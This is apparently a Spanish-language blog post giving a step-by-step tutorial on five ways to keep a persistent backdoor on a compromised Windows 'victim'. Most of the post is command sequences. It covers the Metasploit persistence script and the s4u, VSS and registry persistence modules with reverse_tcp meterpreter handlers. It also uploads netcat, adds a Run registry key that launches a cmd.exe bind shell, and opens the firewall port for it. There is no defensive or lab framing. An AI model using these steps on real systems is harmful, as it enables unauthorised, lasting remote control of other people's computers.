martes, 6 de septiembre de 2016

5 BACKDOORS PERSISTENTES

Requisitos:

  • Sesión meterpreter con permisos elevados (Bypass UAC)
  • Metasploit
  • Netcat
  • Distribución Linux (Atacante)
  • Windows (Víctima)

Definición de backdoor:

Tipo de troyano que permite el acceso al sistema infectado y su control remoto. El atacante puede entonces eliminar o modificar archivos, ejecutar programas, enviar correos masivamente o instalar herramientas maliciosas. Los backdoors y troyanos no son exactamente lo mismo aunque, a día de hoy, muchos troyanos incorporan funcionalidades de backdoor para poder acceder a la máquina infectada cuando lo desee el atacante, para seguir realizando sus actividades maliciosas.

Persistencia:

En la sesión meterpreter con permisos elevados:
  • run persistence –X –i 10 –p 443 –r [IP]
-X= Conectarse cuando el sistema reinicie.
-i 10= Intentar conectarse cada 10 segundos.
-p 443= Puerto de conexión reversa.
-r ip= IP de conexión reversa-
Después de haber ejecutado el script, reiniciamos el equipo víctima y usamos el exploit:
  • use exploit/multi/handler
    • set PAYLOAD windows/meterpreter/reverse_tcp
    • set LPORT 443
    • set LHOST [IP LOCAL]
    • exploit

s4u_persistence:

Crea una tarea programada que se ejecutará utilizando el servicio para el usuario (S4U). Esto permite que la tarea programada para ejecutarse incluso como un usuario sin privilegios que no se registra en el dispositivo. Esto resultará en contexto de seguridad más bajo, lo que permite el acceso sólo a los recursos locales. El módulo requiere ‘Logon as a batch job’ permisos (SeBatchLogonRight).
Pondremos en background la sesión meterpreter con bypass uac y:
  • use exploit/windows/local/s4u_persistence
    • set PAYLOAD windows/meterpreter/reverse_tcp
    • set LHOST [IP LOCAL]
    • set LPORT 443
    • set trigger logon
    • set session [Número sesión]
    • exploit
Después de haber ejecutado el script, reiniciamos el equipo víctima y usamos el exploit:
  • use exploit/multi/handler
    • set PAYLOAD windows/meterpreter/reverse_tcp
    • set LHOST [IP LOCAL]
    • exploit

VSS_PERSISTENCE:

Este módulo intentará crear un payload persistente en una nueva instantánea de volumen. Esto se basa en la secuencia de comandos VSSOwn publicado originalmente por Tim Tomes y Mark Baggett. Este módulo ha sido probado con éxito en Windows 7. Con el fin de lograr la persistencia a través de la opción RUNKEY, el usuario debe necesitar una contraseña para iniciar sesión en el equipo atacado.
Primero consigue una shell meterpreter con bypass uac y pon en background la sesión despues ejecuta los siguientes comandos:
  • use exploit/windows/local/vss_persistence
    • set runkey true
    • set schtask true
    • set RHOST [IP VÍCTIMA]
    • set session [Número sesión]
    • exploit
Ahora al ejecutar el exploit se creará un backdoor y una nueva sesión meterpreter.
Ahora al reiniciar el equipo víctima se perderán las sesiones meterpreter, usa el siguiente comando para abrir una nueva:
  • use exploit/multi/handler
    • set payload windows/meterpreter/reverse_tcp
    • set LHOST [IP LOCAL]
    • set LPORT 4444
    • exploit

REGISTRY PERSISTENCE:

En este módulo se instalará un payload que se ejecutará durante el arranque. Será ejecutado ya sea al iniciar la sesión de usuario o el inicio del sistema mediante el valor de registro en “CurrentVersion \ Run” (dependiendo de privilegio y método seleccionado). El payload se instalará completamente en el primer registro de la sesión fondo meterpreter y luego ejecutar los comandos:
Primero consigue una shell meterpreter con bypass uac y pon en background la sesión despues ejecuta los siguientes comandos:
  • use exploit/windows/local/registry_persistence
    • set payload windows/meterpreter/reverse_tcp
    • set LHOST [IP LOCAL]
    • set LPORT 4545
    • set startup system
    • set session [Número de la sesión]
    • exploit
Ahora al reiniciar el sistema perderemos las sesiones asique usaremos los siguientes comandos para abrir una nueva:
  • use exploit/multi/handler
    • set payload windows/meterpreter/reverse_tcp
    • set LHOST [IP LOCAL]
    • set LPORT 4545
    • exploit

NETCAT:

Netcat es una utilidad de red ofrecido que lee y escribe datos a través de conexiones de red, utilizando el protocolo TCP / IP.
Después de tener nuestra sesión meterpreter con bypass uac pondremos:
  • upload /usr/share/windows-binaries/nc.exe C:\\Windows\\system32
Ahora vamos a setear el valor del registro:
  • reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v netcat -d ‘C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe’
Abrimos una shell con el comando:
  • shell
Y abriremos el puerto en el firewall:
  • netsh advfirewall firewall add rule name=’netcat’ dir=in action=allow protocol=Tcp localport=4445
Para saber que todo está bien configurado pondremos:
  • netsh firewall show portopening
Veremos que tenemos la regla de netcat en el firewall.
Una vez reiniciemos el pc víctima, para conectarnos a él usaremos el comando:
  • nc  -nv [IP VÍCTIMA] [PUERTO/4445]
Previous Post
Next Post

post written by:

0 comentarios: